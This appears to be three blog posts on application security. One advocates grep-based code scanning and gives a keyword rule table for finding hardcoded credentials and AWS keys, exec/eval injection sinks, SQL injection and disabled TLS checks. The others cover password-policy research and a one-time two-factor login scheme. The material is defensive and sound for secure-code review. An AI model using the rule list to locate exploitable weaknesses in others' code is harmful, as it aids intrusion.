Don’t Underestimate Grep Based Code Scanning

Static analysis tools (SAST) are perhaps the most common tool for an AppSec team in the endless effort to move security to the left. They can be integrated into development pipelines in order to offer quick feedback to the developer to catch security bugs, resulting in faster remediation times and improved return on investment for developing secure software.

The SAST market is dominated by a small number of big players that charge high licencing fees for tools that do sophisticated analysis. One of the main features of such tools is the data flow analysis, which traces vulnerabilities from source to sink, potentially going across a number of files. More information about what such tools can do can be found in this Synopsis report.  These tools typically can take hours or even days to complete a scan, and may use a large amount of memory. Furthermore, some of the tools have a large number of false positives, and potentially their own eccentricities. For organisations with deep pockets, the benefits outweigh the costs.

There are lower cost, more efficient SAST tools, but they typically do lack the sophistication in terms of quality of security bug findings. Perhaps the most popular low-cost alternative is SonarQube, which is quite popular amont developers. SonarQube does very quick scans, but lacks the data flow analysis capability that the more expensive tools have. As a consequence, security findings are represented in one place (not source-to-sink analysis).

In this blog, we’re going to talk about grep-based code scanning, which is an old fashioned way of SAST scanning — but we argue that good grep based scanning can do reasonably well compared to expensive SAST tools in terms of quality of bugs found. While grep based-scanning in the form we present it cannot do data flow analysis, we claim that the major shortcomings in what we miss are not extensive. We also show examples of things we found that our commercial tool at the time missed. While it is certainly capable that the commercial tools can build up their rule sets to catch everything we catch, it falls upon them to add those rules.

I have experience we three leading SAST tools, but considerable experience with only one of them. I’m not going to call out any names of tools, but I do generally see room for improvement in them.

In order to make this blog the most beneficial to the readers, we will provide a starting pack of grep-based rule sets that we have used. The tools we have developed are not in a state that they can be open sourced, and we do not have the time to fix them up. However, the rules we provide open the door for somebody with that time availability to do so. It takes very little effort to build a PoC in this way.

This is joint work with Jack Healy.

Tool philosophy

False positives seem part of the game in the SAST market. While I have heard of one tool trying to put considerable focus into removing false positives, I have not experienced such features in the tools that I have worked with — at least not “out of the box.” As a consequence, many tools seem to require manual inspection of the findings to remove the junk and focus on the issues that seem real. In our grep-based scanner, we play by the same rules: we assume that the results are going to be inspected manually, and the person running the tool has a basic understanding of security vulnerabilities and how to identify them in code. Thus, grep-based code scanning assumes a certain level of security competence and language expertise by the person running the code scan.

We take the philosophy that is okay to have a large number of false positives if we are looking at something that is very serious and too often a problem — for example, SQL injection. We take the philosophy that it is not okay to have a lot of false positives if the issues is not that serious (by CVSS rating). Generally, we are not trying to find everything, but instead trying to maximise the value we get out of our code scanning under a manual inspection time constraint. It’s worth spending extra time for catching the big fish, not for the small ones.

Depending upon how the tool is used, we may under some conditions want to report only things that are high confidence, and ignore everything else. A common example is in a CICD environment, where you want to break a build only if you are quite confident that something is wrong. So in our case, we have an option to only report very high confidence results. We also allow developers to flag false positives similar to how SonarQube does it, thus making it developer friendly.

What do we lose by not having data flow analysis?

While the expensive tools have the advantage of data flow analysis, our belief is that we can get a lot of what they get without it. The biggest exception is cross-site scripting, which our grep-based scanner does not find. We consider alternative tooling such as DAST to be an option for finding this serious issue.

Another example of an important issue that we are unlikely to find is logging of sensitive information. Typically that does require some type of data flow analysis — you’re almost never going to find code that directly does something direct like Log(password).

But something like SQL injection, we have found a number of times. The reason being — we report every SQL query we find. Yes, it’s noisy, but it takes a code reviewer at most 10 seconds of manual inspection time to see if there is a string concatenation in the query, and if that’s the case, it may be vulnerable. If not, the reviewer can quickly dismiss it as a false positive. Obviously more sophisticated code scanning can make this less noisy (example: regular expression code scanning), but this is our starting point.

Certainly tools with data flow analysis are more efficient for something important like SQL injection. However the benefit from that efficiency is often lost when weighed against how much manual time is lost on false positives for issues that are not that important and/or low confidence. Furthermore, some tools do not do so well in terms of rating the seriousness of a vulnerability: they can be over-zealous in calling too many issues critical or high risk (though this may be configurable). Because of this, the overall usage of our tool — at least for us — seems to require similar manual effort as some of the popular commercial tools despite the simplicity of the design.

Examples of things we found that our main commercial tool missed

Because of the simplicity of our design and because we assume that a competent reviewer is going to look a the code, we were able to put in rules that help the reviewer find things that big commercial tools tend to miss.

One very fruitful area in finding security bugs is bad crypto. As mentioned in Top 10 Developer Crypto Mistakes, bad crypto is more prevalent than good crypto. Part of the reason for this is bad crypto APIs. Another part of the reason is that the tools don’t help developers catch mistakes. Vendors of these tools could find a lot more problems if they were to listen to cryptographers. Our tool flags any use of “crypt” and any other key words that are indicative of bad cryptography, such as rc4, arcfour, md5, sha1, TripleDES, etc…. We go into more details about crypto bugs in the rules sets.

Another issue that we find surprisingly often that our main commercial tool missed was http://. Of course it should always be https://. Similarly one can look for ftp:// and other insecure protocols.

There are also a number of dangerous functions that we flag, and often these open up discussions about coding practices. For example, the Angluar trustAsHtml or React dangerouslySetInnerHTML. In our case, we had to educate the developers on the right approach to handle untrusted data, because they thought it was safe to sanitise data prior to putting in the database and then use trustAsHtml upon display. We did not agree with this coding style and worked to change it.

One thing that we like to always look at is MVC controller functionality because sometimes that’s where input validation should be applied (in other times you might do it in the model). We often find a lack of input validation, which does not necessarily imply a vulnerability but does show the need for improved defensive programming. Even more interesting, one time when we looked at a controller, we found that it was obviously not doing access control checking that it should be doing, and this was one of the most major findings that we caught. Normally access control problems are not something you would find with a SAST tool, but our differing approach to how to use the tool made it work for us.

Sample rules: starter pack

Rules can go on forever, so here I want to just focus on some of the more fruitful ones to get you started. Generally we do a case insensitive grep to find the key word, and then we grep out (“grep -v”) things that got in by chance but are not actually the key word we are looking for. We call these “exceptions” to our rules.  For example “3des” is indicative of the insecure triple DES encryption algorithm, but we wouldn’t want to pull in a variable like “S3Destination”, which our developers might use for Amazon S3 storage (nothing to do with triple DES). We learn the exceptions over time.

A very common grep rule that we need to make exceptions for is “http:”.  While we are looking for insecure transport layer communications, the problem is that “http:” is also used in XML namespaces that have nothing to do with transport layer security.  This means we have to grep out things like “xmlns”.  Also, writing logic to ignore commented code helps a lot — otherwise you will pull in many false positives like license example (http://www.apache.org/licenses) or stackoverflow links, which often occur in comments.

It may look like we omitted some obvious rules in some cases, but sometimes there are subtle reasons. For example, even though we do a lot of crypto rules, we don’t do an “ECB” (insecure electronic code book mode of operation) search simply because it is too noisy. Those characters “E”, “C”, and “B” all look like hexadecimal numbers, and we often got false positives from hexadecimal values in code. It was deemed not fruitful enough to keep such a rule (as explained in our design philosophy above).

We also try to group our rule by language to reduce false positives. However some rules apply to all languages. In our case we are primarily working on web software so we don’t specify languages like C/C++, etc…

Below is the starter pack of rules. Some rules are clearly more noisy than others — people can pick and choose the ones they want to focus on.

Grep string Look for Languages
password, passwd, credential, passphrase Hardcoded passwords, insecure password storage, insecure password transmission, password policy, etc…. all
sql, query( sql injection (string concatenation) all
strcat, strcpy, strncat, strncpy, sprintf, gets dangerous C functions used in iOS iOS
setAllowsAnyHTTPSCertificate, validatesSecureCertificate, allowInvalidCertificates, kCFStreamSSLValidatesCertificateChain disables TLS cert checking iOS
crypt hardcoded keys, fixed IVs, confusing encryption with message integrity, hardcoded salts, crypto soup, insecure mode of operation for symmetric cipher, misuse of a hash function, confusing a password with a crypto key, insecure randomness, key size too small.  See Top 10 Developer Crypto Mistakes all
CCCrypt IV is not optional (Apple API documentation is wrong) if security is required iOS
md5, sha1, sha-1 insecure, deprecate hash function all
3des, des3, TripleDES insecure deprecate encryption function all
debuggable do not ship debugabble code android
WRITE_EXTERNAL_STORAGE, sdcard, getExternalStorageDirectory, isExternalStorageWritable check that sensitive data is not being written to insecure storage android
MODE_WORLD_READABLE, MODE_WORLD_WRITEABLE should never make files world readable or writeable android
SSLSocketFactory dangerous functionality — insecure API, easy to make mistakes java
SecretKeySpec verify that crypto keys are not hardcoded java
PBEParameterSpec verify salt is not hardcoded and iterations is at least 10,000 c#
PasswordDeriveBytes insecure password based key derivation function (PBKDF1) c#
rc4, arcfour deprecated, insecure stream cipher all
exec( remote code execution if user input is sent in java
eval( remote code execution if user input is sent in javascript
http: insecure transport layer security, need https: all
ftp: insecure file transfer, need ftps: all
ALLOW_ALL_HOSTNAME_VERIFIER, AllowAllHostnameVerifier certificate checking disabled java
printStackTrace should not output stack traces (information disclosure) java, jsp
readObject( potential deserialization vulnerability if input is untrusted java
dangerouslySetInnerHTML dangerous React functionality (XSS) javascript
trustAsHtml dangerous Angular functionality

(XSS)

javascript
Math.random( not cryptographically secure javascript
java.util.Random not cryptographically secure java
SAXParserFactory, DOM4J, XMLInputFactory, TransformerFactory, javax.xml.validation.Validator, SchemaFactory, SAXTransformerFactory, XMLReader SAXBuilder, SAXReader, javax.xml.bind.Unmarshaller, XPathExpression DOMSource, StAXSource vulnerable to XXE by default java
controller MVC controller functionality: check for input validation c#, java
HttpServletRequest check for input validation java
request.getParameter check for input validation jsp
exec dynamic sql: potential for sql injection sql
getAcceptedIssuers If null is returned, then TLS host name verification is disabled android
isTrusted If returns true, then TLS validation is disabled java
trustmanager could be used to skip cert checking java
ServerCertificateValidationCallback If returns true, then TLS validation is disabled c#
checkCertificateName If set to false, then hostname verification is disabled c#
checkCertificateRevocationList If set to false, then CRLS not checked c#
NODE_TLS_REJECT_UNAUTHORIZED certificate checking is disabled javascript
rejectUnauthorized, insecure, strictSSL, clientPemCrtSignedBySelfSignedRootCaBuffer cert checking may be disabled javascript
NSExceptionDomains, NSAllowsArbitraryLoads, NSExceptionAllowsInsecureHTTPLoads allows http instead of https traffic iOS
kSSLProtocol3, kSSLProtocol2, kSSLProtocolAll, NSExceptionMinimumTLSVersion allows insecure SSL communications iOS
public-read publicly readable Amazon S3 bucket — make sure no confidential data stored all
AWS_KEY look for hardcoded AWS keys all
urllib3.disable_warnings certificate checking may be disabled python
ssl_version can be used to allow insecure SSL comms python
cookie make sure cookies set secure and httpOnly attributes all
kSecAttrAccessibleAlways insecure keychain access iOS

Collection of References on Why Password Policies Need to Change

Organisations like NIST and the UK National Cyber Security Centre (NCSC) are pushing password security policies that are much different from the past. Most notably, password expiry and character composition rules are being dropped, and replaced by other more user friendly recommendations.  Despite their efforts, many organisations are very slow in changing to the modern guidance, and instead remain with password policy practices that are characteristic of 2004 guidance. If you’d like to work towards change in your organisation, it helps to have a useful set of references to pass on to those who write the policies.

Is it worth trying to make the change? In my judgement, an important part of building a positive security culture is considering pain versus value in every decision you make. A lot of historical guidance for password security is high pain and little to no security value according to what we have learned, and sometimes causes more harm than good in ways that policy makers never anticipated. We also must remember that availability is one of the three pillars of security: when users get locked out of their account for reasons that can at least partially be attributed to password security policies, then we are not putting the best face of security forward.  This is especially true when there are better ways to do things:  Security policy writers need to keep their knowledge up to date.

This blog contains a information from various sources including research papers, reports/white papers, popular blogs, government websites, and news organisations. Dates of publications are included so readers can keep in mind that more recent publications are based upon more recent knowledge. While there are many existing blogs on password security, the main contributions here are:

  1. Assembling a large number of modern sources together,
  2. Providing compact summaries of why the sources are relevant to the purpose of making password policy change within an organisation,
  3. Including research publications that show where new recommendations are derived from (thus going beyond “appeal to authority” arguments — the research is there for anybody who cares to check it themselves).

Overview of modern password security guidance

  • (WSJ news article – requires subscription, 2017) The Man Who Wrote Those Password Rules Has a New Tip: N3v$r M1^d!. This article talks about how the author of the classic NIST document that proposed composition rules and similar guidance (from NIST Special Publication 800-63 Appendix A) now rejects those recommendations. Those recommendations seemed to be okay back then, but by what we have learned today, they no longer serve the original intent. New recommendations are written that balance security with usability needs.
  • (Naked Security news article, 2016) NIST’s new password rules – what you need to know. This is a compact summary of the changes to NIST’s password security guidance. Because the article is short, it is a good way to open up the conversation with people who have limited time or attention span. It tells what policy makers need to change to be in compliance with NIST guidelines.
  • (Troy Hunt blog, 2017) Passwords Evolved: Authentication Guidance for the Modern Era. This is quite a long, but very well written article about the changes to NIST’s password guidance and why the changes are being made. It also draws from the UK government’s guidance and Microsoft’s guidance to strengthen the argument. The section on “Listen to Your Governments (and Smart Tech Companies)” makes a great appeal to authority argument on why companies should take these recommendations seriously. Overall, it is a good read for those who have time and interest to read it.

The new recommendations — original sources

  • (NIST publication, 2017) NIST Special Publication 800-63B. This is right from the horse’s mouth, but it’s not a document to start the conversation with because the document is large and uses terminology that will take time for many readers to interpret. It is nevertheless the proof you will need if people question whether NIST is really making such a recommendation. For example, the requirement not to expire have composition rules for passwords (“memorized secrets”) is given in section 10.2.1. That section also says these secrets should not be required to change periodically. The requirement to not allow hints to recover passwords is given in section 5.1.1.2. The requirement to not allow secret questions for account recovery is better found in NIST’s FAQ.
  • (NIST web page FAQ, 2019) NIST Special Publication 800-63: Digital Identity Guidelines Frequently Asked Questions. This is an easier place to start than the NIST original publication, as it is more human readable. It gets right to the point on questions like why composition rules are no longer recommended, why password expiry is no longer recommended, and why secret questions for account recovery are no longer permitted.
  • (NCSC publication, 2018) Password administration for system owners. These recommendations are similar in nature to the NIST recommendations. See sections on “Don’t enforce regular password expiry” and “Do not use complexity requirements”. But additionally worth pointing out is “Reduce your organisation’s reliance on passwords” (we have too many passwords already) and “Implement technical solutions”, which includes other ways guidance on helping protect user passwords while not locking users out of their accounts long-term.
  • (NCSC infographic, 2018) NCSC Password Policy Advice for system owners. A simple graphic that shows the risks and how to help improve password security within an organisation. The right half in purple gives password policy recommendations (unfortunately, while most of the infographic is good, there is one serious blunder in it where it recommends SHA-256 for password hashing. SHA256 was not designed for this type operation. Those who know the cryptography understand this, those who don’t can get the understanding from an old Troy Hunt article).
  • (NCSC blog, 2016) The problems with forcing regular password expiry.  A simple blog that explains why password expiry causes more harm than good. In short, users choose similar passwords to previous passwords and minimally meet the complexity requirement to try create a password they can memorise. There is also an increased tendency of forgotten passwords, that causes a productivity cost to an organisation.
  • (Microsoft publication, 2016) Microsoft Password Guidance. This report is great, because it is easy to read and gets right to the point. On the first page it enumerates 7 recommendations to system administrators which include things not to do (do not enforce password expiry or composition rules) and what to do (8 character minimum password, ban common passwords, etc…). Further in the document it goes into more details and includes references to research reports that justify why the changes are being made. Overall, the clarity, simplicity, and completeness (especially research references) of this publication make it a top source for referencing to others. However, because it predates the NIST and NCSC changes, it lacks the references to NIST’s new guidelines. It also lacks details on how organisations can implement the risk based multi factor authentication that it recommends.

Research on why password policies need to change

  • (Research paper, 2010) The Security of Modern Password Expiration: An Algorithmic Framework and Empirical Analysis. The main goal of password expiry is limiting the amount of time an attacker has access to an account in the event of password compromise. This paper questions whether that goal is met by analysing a dataset of 7700 accounts to determine whether knowing one password allowed recovering other passwords for that user. The fallacy around password expiry recommendations is that security administrators assume users choose each password randomly and independently from other passwords, but the reality is that the vast majority of users don’t . The paper shows even for websites where users have an incentive in protecting their accounts (for example, it holds payroll data), new user passwords tend to be strongly related to previous ones. The study found that could derive 17% of new passwords within 5 guesses and 41% of new passwords within seconds in an offline attack with little effort. The authors write:

    “Combined with the annoyance that expiration causes users, our evidence suggests it may be appropriate to do away with password expiration altogether, perhaps as a concession while requiring users to invest the effort to select a significantly stronger password than they would otherwise (e.g., a much longer passphrase).”

  • (Research paper, 2010) Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords.  When NIST wrote their 2004 Special Publication 800-63 that had the recommendations for password policy, they included entropy estimates on how strong the passwords complying to the policy would be. This research does password cracking on sets of real user data to prove that those estimates are far too high. Part of the reason for this is that users tend to follow similar patterns when forced to comply with a password policy. For example, when required to use digits, users tend to either choose all digits or else put the digits at the end of the password (nearly 85%); When required to use an upper case letter, users tend to use either all upper case or put only the first letter as upper case (89%); and when required to use a special character users tend to put it at the end of the password (28.5%). An attacker can use known human behaviour to increase his chances of success for password cracking attacks. The paper notes that using a password blacklist of 50,000 passwords helps significantly, but not as much as NIST predicted. The authors conclude

    Our findings were that … most common password creation policies remains vulnerable to online attack. This is due to a subset of the users picking easy to guess passwords that still comply with the password creation policy in place, for example “Password!1”

  • (Research paper, 1999) Users are not the Enemy.  This paper surveys a large number of users to understand the problems they have with password security. While it is true that many users do not assume the responsibility they should for protecting their accounts, the study also finds that part of the problem is the difficulty users have with complying with password security policies. Users have a large number of passwords that need to change regularly and each having different password complexity requirements, which makes it much more likely that users will do things that they should not do just so they do not lose access to their accounts. The section on Security needs user-centered design notes that

    Many of these [security] mechanisms create overheads for users, or require unworkable user behavior. It is therefore hardly surprising to find, that many users try to circumvent such mechanisms.”

    The paper concludes with a set of recommendations to help users with passwords. However, this paper is old (from 1999) so therefore the recommendations are also subject to the knowledge of the time.

  • (Research paper, 2010) The True Cost of Unusable Password Policies: Password Use in the Wild.  The authors note that users are generally cogent in their understanding of security needs, but found compliance to passwords policies too difficult. To cope with security demands, users developed their own strategies, which end up introducing their own problems. As a consequence, the complexity of complying with security policies results in an adverse effect on the security posture of the organisations. For example, one user dealt with a policy that forced him to change his password in a way that it was not similar to any 12 of his previous passwords by just writing down the password so he would not forget it. In the section on Towards Holistic Password Policies, the authors note that just looking at the technical side and ignoring the user side, does not encourage security awareness — instead it introduces problems that antagonise users. Instead, password policies need to be design for the context in which users use the systems for, with an emphasis on eliminating the risks that they are likely to face in that context.
  • (Research paper, 2007) Do Strong Web Passwords Accomplish Anything?. There are many ways that an attacker may go after a user, and password policies only address defence against brute forcing attacks. They do not address phishing, key logging, shoulder surfing, insecure password storage on local machines, and guessing based upon special knowledge about the user. Although strong passwords do help in some cases, there are other more user-friendly security controls that could be put in place of the complex password policy. These other controls make strong password policies less important. The paper argues

    Since the cost is borne by the user, but the benefit is enjoyed by the bank user resistance to stronger passwords is predictable. We argue that there are better means of addressing brute-force bulk guessing attacks.

    However this paper is from 2007. See next item which is related but more recent:

  • (Blog, 2019) Your Pa$$word doesn’t matter.  This blog unfortunately has a misleading title that caused many readers to misjudge it before reading it. It is not telling users not to choose strong passwords, but instead is saying that password complexity policies have little benefit when considering the various ways that passwords are attacked. In spirit it is similar to the previous item, but this research is more modern. It tells system administrators and security policy writers:

    “Focusing on password rules, rather than things that can really help – like multi-factor authentication (MFA), or great threat detection – is just a distraction.”

  • (Research paper, 2015) Quantifying the Security Advantage of Password Expiration Policies. The abstract gets right to the point:

    “Many security policies force users to change passwords within fixed intervals, with the apparent justification that this improves overall security. However, the implied security benefit has never been explicitly quantified. In this note, we quantify the security advantage of a password expiration policy, finding that the optimal benefit is relatively minor at best, and questionable in light of overall costs.”

    This paper does a mathematical analysis on the benefit of password expiry policies. Without considering the possibility of new passwords being related to old, this paper instead considers an attacker who keeps trying to guess the user password in an online attack even after the password might have changed without the attackers knowledge of that change happening. In essence, they show that the attacker’s chance of success is not largely different than if there was no password expiry policy in place. And this is even if the password is chosen randomly (most users don’t do this complexity, which makes attacks easier). The authors conclude by challenging those who favour such policies to explain why and in which specific circumstances a substantiating benefit is evident.

  • (Research paper, 2009) It’s no secret : Measuring the security and reliability of authentication via ‘secret’ questions.  Historically, requiring users to provide answers to secret questions upon registration was a way to do account recovery in the event of forgotten password. This paper analyses these practices and finds that 20% of users forget their own answers to secret questions within 6 months, acquaintances of such people can guess answers to their secret questions 17% of the time, and 13% of the time an answer could be guessed by an attacker within 5 attempts by trying the most popular answers. The authors conclude that these questions are neither reliable nor do they meet security requirements. They propose a number of options to improve secret questions or have alternative backup authenticators, but ultimately this paper more than any other lead to the removal of secret questions for account recovery.

Other references

  • (Microsoft blog, 2019) Security baseline (FINAL) for Windows 10 v1903 and Windows Server v1903.  Periodic password expiration will no longer be enabled in Windows 10 and Windows Server. The blog writes

    “Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value. By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance. At the same time, we must reiterate that we strongly recommend additional protections even though they cannot be expressed in our baselines.”

  • (FTC blog, 2016) Time to rethink mandatory password changes.  This is from a former Chief Technologist of the US Federal Trade Commission. The author explains why requiring users to change their passwords does more harm than good, and includes a long list of references like many included here to back up the argument. While there may be reasons for you to change your password (examples given), requiring regular changes in a password policy is not necessarily good practice:

    Research suggests frequent mandatory expiration inconveniences and annoys users without as much security benefit as previously thought, and may even cause some users to behave less securely. Encouraging users to make the effort to create a strong password that they will be able to use for a long time may be a better approach for many organizations…

Concluding remarks

The shortcomings of legacy password policies are well documented, however there are two distinct philosophies for moving forward.  On one hand, there remains the “fix the user” philosophy which pushes education and password managers as the main mechanisms for protecting user accounts.  The alternate approach is to design systems that are less reliant upon passwords as the sole determinant for authentication, which is the approach that Google and Microsoft seem to be taking (related: see Protecting User Accounts When Usability Matters).  I honestly believe that both philosophies have a place going forward.  The problem today is that there is way too much emphasis on the former and not enough effort being put into the latter.  We can’t always count on people to do the right thing, but there are often things we can do to protect their backs when they are negligent.  Putting security complexity burden on the user should be the last fallback option, not the default option.

Protecting User Accounts When Usability Matters

Scenario: Password guessing attacks are happening on your website. The attacker is performing password spraying: he tries a single password for a user, and if it fails, he moves on to the next user. The attacker is also changing his IP address, including the use of IP addresses that are geolocated where many legitimate users come from.

Because of the attacker’s tactics, blocking IP addresses and account lockouts won’t work. You also work for a business that is very sensitive to security controls that impact usability. Captchas, two-factor authentication, and stronger password security policies are rejected by the business.

What can you do?

This blog is about a security control that largely prevents these type of password guessing attacks at minimal usability impact. We call it One-Time Two Factor Authentication (OT2FA). It’s a simple idea derived from a number of sources, including:

Revisiting Defenses Against Large-Scale Online Password Guessing Attacks by Mansour Alsaleh, Mohammad Mannan, and P.C. van Oorschot.
Securing Passwords Against Dictionary Attacks by Benny Pinkas and Tomas Sander.
Enhanced Authentication In Online Banking by Gregory D. Williamson.

OT2FA should not be considered new, as it has strong similarities to what companies like Google and Lastpass are doing (though their implementation details are unpublished). However too many websites are doing alternatives that are both less secure and less user friendly.

One-Time Two Factor Authentication

Two-factor authentication (2FA) is an effective security control for preventing password guessing attacks, but it comes at a large usability impact: users don’t like be challenged for a one-time secret code every time they login. Businesses that are trying to acquire new users to win market share are averse to security controls that annoy users.

But what if one could get close to the security of 2FA with little usability impact? This is what OT2FA aims to accomplish.

The idea is simple: the first time a user logs in from a new user agent (i.e. browser or client software), require them to prove their identity via two-factors: their password, and a secret code that is emailed or SMSed to them (note: email is preferable as SMS security is known to be weak). When the user succeeds in proving the identity, provide a digitally signed token, such as a JWT, back to the user agent: “User X signed in from this device before.” Instead of the actual user name, something like a UUID should be used for the identity, which is tied to the username inside the server database. The token, called a OT2FA token, serves the purpose of marking that user agent trusted for that user. For web browsers, it is particularly convenient to store it in a cookie.

The next time that same user logs in from that user agent, they only need to provide the username and password, and the OT2FA token is sent up transparently to the user as the second factor proof of identity. The server authenticates the user by verifying the username and password are correct, the digital signature on the OT2FA token is valid, and the identity of the user in the OT2FA token maps to the username provided. If all are correct, access is granted without requiring a 2FA challenge from the user. In other words, the second factor challenge to the user happens only the first time he logs in from a particular user agent, and then the user never sees the second factor challenge on that user agent again. Hence the name: One-Time Two Factor Authentication.

This protection is not perfect, but it is a huge improvement in security at little impact to the user. The main thing is that it stops the large scale password guessing attacks: an attacker can only succeed against a user if he not only knows the username and password, but he also can crack the second factor or somehow get the user’s OT2FA token. If we make the assumption that no attacker is going to collect a large number of user OT2FA tokens (discussed further in the Potential Concerns section below), then we would believe that we have stopped the large scale password guessing attacks.

For emphasis, OT2FA is designed only to prevent password guessing attacks against users. There is no need to challenge the user for a second factor when they sign up for an account – new users should get an OT2FA token by default.

Below, we will discuss enhancements and then potential security concerns, but let’s first review where we are. In the context of password guessing attacks, Username/password-only is low security, but very usable. Two factor authentication is high security, but scores low on the usability scale. OT2FA is not as secure as 2FA nor as user-friendly as Username/password-only, but is not bad in either category, and could arguably considered good in both. Therefore OT2FA is a realistic security option for websites built with a strong emphasis on usability.

Enhancements

There are a many directions that one can go to enhance this idea.

For example, by including a unique identifier for each OT2FA token and storing the corresponding value in the database, you can give users the option to revoke OT2FA tokens living on trusted devices / user agents that should no longer be trusted for that user. So although you cannot make the OT2FA token go away, you can enforce on the server side that the specific OT2FA token being sent up is one that the user has not revoked. Some subtleties are discussed in Footnote 1 at the bottom.

Alternatively to maintaining server side state for revocation purposes, one could expire the OT2FA token. Indeed, many implementations (gmail, Lastpass, Azure DevOps, etc…) do this with a fixed expiry, and ask the user for a new 2FA challenge on a regular basis. The problem with expiring the token after a fixed interval is that it no longer meets the “one time” requirement for this design.

A more user-friendly approach to fixed token expiry is to set an initial expiry, but generate a new token with extended expiry each time the user returns. This mimics how “remember me” functionality is often implemented. If a user’s OT2FA token becomes known to an attacker, the user’s only defence then is his password, which needs to be strong enough to prevent the attacker from getting in until the compromised OT2FA token expires.  Although less than ideal, attackers are largely limited in the number of accounts they can go after assuming that there is no mass OT2FA token leakage.

Another direction is that OT2FA can be combined with (temporary) account lockout. Different failed password attempts thresholds can be allowed depending upon whether or not a valid OT2FA token is present. For example, one can impose a temporary lockout when the OT2FA token is not present, but still allow logins when the OT2FA token is present – provided that the second (higher) threshold for failed password attempts is not reached. This allows legitimate users, coming from trusted user agents, in easily while preventing hackers from getting in at the same time. It also mitigates the risk of an attacker trying to lock out a legitimate user from his account.

Another idea is allowing more than one user to login from a user agents for shared devices/computers. However there is a risk of over-engineering the implementation for limited benefit.

One can also consider a number of options to rolling this out smoothly, so it becomes as transparent as possible when the technology is first adopted by a company to their existing user base. There are many approaches for that, which would be too much of a tangent to expound upon here.

Aside: Clarification on Tokens

OT2FA tokens should not be confused with session ids or session tokens.

Session ids/tokens are high value and relatively short lived.  If an attacker captures a session token, he then can hijack the victim’s account.

OT2FA tokens are long-lived tokens and are insufficient for hijacking an account.  OT2FA tokens serve one purpose: to limit the ability of a hacker to perform password guessing attacks on user accounts.

Potential Concerns

The implementation may leak the validity of the password: The most straightforward way of implementing this is to only challenge for the second factor after the the username and password are confirmed. Note that if it is not implemented this way, then the user would (under some implementation assumptions) get notified every time somebody malicious tries an incorrect password for that user, which would be annoying and a cause of unnecessary stress to the user.

The fact that the validity of the password is leaked is not necessarily a bad thing. In fact, depending upon the wording of the email/SMS with the 2nd factor code, it may be a good thing because it alerts the user that there is good reason to change your password. For example, a notice like:

A new device has attempted to login to your account! If this is you, please click this link to prove your identity.
If this was not you, then it means that somebody has your password. Don’t panic: we have protected access to your account. However, we recommend that you change your password to prevent this person from continuing to attempt to access your account.”

Remark: The academic research papers mentioned above are more sophisticated than OT2FA, and attempt to hide the validity of the password (See Section 4 of Pinkas and Sander paper). But they do so using captchas, which we consider a no-no for usability and accessibility reasons. Not to mention that machines seem to be better than humans at captchas nowadays, which defeats the whole point of the technology.

Brute forcing the second factor: When a hacker gets the username and password correct, he can then focus his attention on brute forcing the second factor. This is only practical for the attacker if the second factor is brute force-able (for example, a 6-letter code), in which case it needs to be prevented in some way. For example, for too many wrong second factor guesses, impose a temporary account lockout for devices that do not have a valid OT2FA token for that user. The length of the time for locking the account should be dependent upon the the time to brute force the second factor challenge, and the user should be notified of the lockout via email or SMS.

Private browsing: For those who use private/incognito browsing, they may be forced to do 2FA every time because the OT2FA token does not persist on the client device. Allowing security and privacy conscious individuals to opt-out is one compensating control to address this.

Public/shared computers: You would not want to store the OT2FA token on a shared computer, because this would allow a hacker to capture it and then brute force the password without the second factor challenge. The first defence is to allow the user to click “shared computer” upon login, which will prevent the token from being stored on it. Having a revocation mechanism (see enhancements section) is a second defence.

Stolen OT2FA token: One way to reduce the risk of cookie theft is to make cookies httpOnly. But this alone cannot be relied upon, since there are a number of ways cookies may leak – not to mention that you might not even be using cookies for storing the token.

If the OT2FA token is stolen, it reduces to the security of password-only for that user – assuming the attacker knows to whom the token belongs. Having a revocation mechanism (as described above) is a compensating control.

Mass OT2FA token leakage: If there is mass token theft, then the security reduces to password-only under the assumption that the attacker can somehow map each token to each username. Usernames should not be put in tokens, instead unique identifiers should be stored there that are mapped to the user via the database. If the attacker is able to brute force a large number of these, it implies that the attacker not only has the tokens but also the map between the token and the user. This is a bad situation, and it requires a serious response from the owners of the website. The recommended action is to roll the key that is used for signing the OT2FA token, which means each user has to perform the OT2FA on each of their user agents again.

User loses access to email: If the user loses access to the email address that the second factor authentication requests is sent to, then he cannot add a new user agent as trusted. However, if the user has one already trusted user agent, he can use that one to update his email address on the system, thus working around the problem. When a user’s email address is changed, an email should be sent to the previous address to make sure this did not happen maliciously. There are other controls that can be added to reduce the risk of a hacker who succeeding in defeating the OT2FA from locking out a user from his account.

Questions

Is this the same as OWASP page on device cookies? No. It is similar, but the OWASP description gives out device cookies upon valid username/password without requiring the second factor authentication. As mentioned on the OWASP page, it does not stop password spraying attacks like OT2FA does. It also cites the source as Marc Heuse and Alec Muffett, whose discussions on the topic came years after the research cited at the top of this blog.

Is it just risk based authentication? Risk based authentication was first described in Enhanced Authentication In Online Banking by Gregory D. Williamson in 2006, which we cited at the beginning. The document recommends a number of ideas for enhance security, such as:

Machine Authentication, or PC fingerprinting, is a developing and widely used form of authentication (FFIEC, 2005). This type of authentication uses the customer’s computer as a second form of authentication (PassMark Security, n.d.). Machine authentication is the process of gathering information about the customer’s computer, such as serial numbers, MAC addresses of parts in the computer, system configuration information, and other identifying information that is unique to each machine. A profile is then built for the user and the machine. The profile is captured and stored on the machine for future use by the authentication system (PassMark Security, n.d.). Once the PC fingerprint is gathered, the system knows what machine attributes should be present when the user attempts to access their online bank account (Entrust, 2005). This type of authentication usually requires the user to register the machine at first sign on. If a customer logs in from another computer the system will know to further scrutinize the login attempt. At this point the system can prompt for additional authentication, such as out of band authentication or shared secret questions.”

The concepts here are very similar to the description of OT2FA except they use device fingerprinting instead of digital signatures to identify devices. Indeed, if one Googles for risk based authentication, many websites (example) talk about device fingerprints without mentioning the concept of digital signatures.

Device fingerprints are less preferable than digital signatures. Through reverse engineering, one is able to determine what device properties are used for the fingerprint. Depending upon exact details, this could potentially be used by a hacker to brute force the fingerprint of a victim once he knows the password. In contrast, brute forcing a cryptographic digital signature is not practical assuming that the crypto is done correctly.

In general, OT2FA is a special case of risk based authentication. It is a particularly simple and strong way of implementing the concept.

Conclusion

When security does not have an adequate answer, we often transfer the burden to the user. Putting too much burden on the user is bad security practice, as it violates the important security principle of pyschological acceptability.

